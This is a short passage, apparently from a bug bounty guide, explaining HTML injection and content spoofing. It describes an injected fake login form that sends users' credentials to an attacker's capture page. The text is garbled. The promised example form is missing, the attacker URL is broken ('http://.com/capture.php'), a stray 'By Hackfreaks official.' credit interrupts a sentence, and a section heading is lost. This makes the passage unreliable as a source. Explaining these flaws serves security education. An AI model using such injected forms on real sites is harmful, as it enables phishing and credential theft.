HTML injection and content spoofing
Hypertext Markup Language (HTML) injection and content spoofing are attacks that allow a malicious user to inject content into a site’s web pages. The attacker can inject HTML elements of their own design, most commonly as a tag that mimics a legitimate login screen in order to trick targets into submitting sensitive information to a malicious site.
Because these types of attacks rely on fooling targets (a practice sometimes called social engineering), By Hackfreaks official. bug bounty programs view content spoofing and HTML injection as less severe than other vulnerabilities covered in this book.
That’s because developers use the HTML language to define the structure of a web page. So if an attacker can inject HTML and the site renders it, the attacker can change what a page looks like. This technique of tricking users into submitting sensitive information through a fake form is referred to as phishing. For example, if a page renders content that you can control,
you might be able to add a tag to the page asking the user to reenter their username and password, like this:
When a user submits this form, the information is sent to an
attacker’s website http://.com/capture.php via an action attribute .
Very similar to HTML injection except attackers can only inject plaintext, not HTML tags. This limitation is typically caused by sites either escaping any included HTML or HTML tags being stripped when the server sends the HTTP response. Although attackers can’t format the web page with content spoofing, they might be able to insert text, such as a message, that looks as though it’s legitimate site content. Such messages can fool targets into performing an action but rely heavily on social engineering.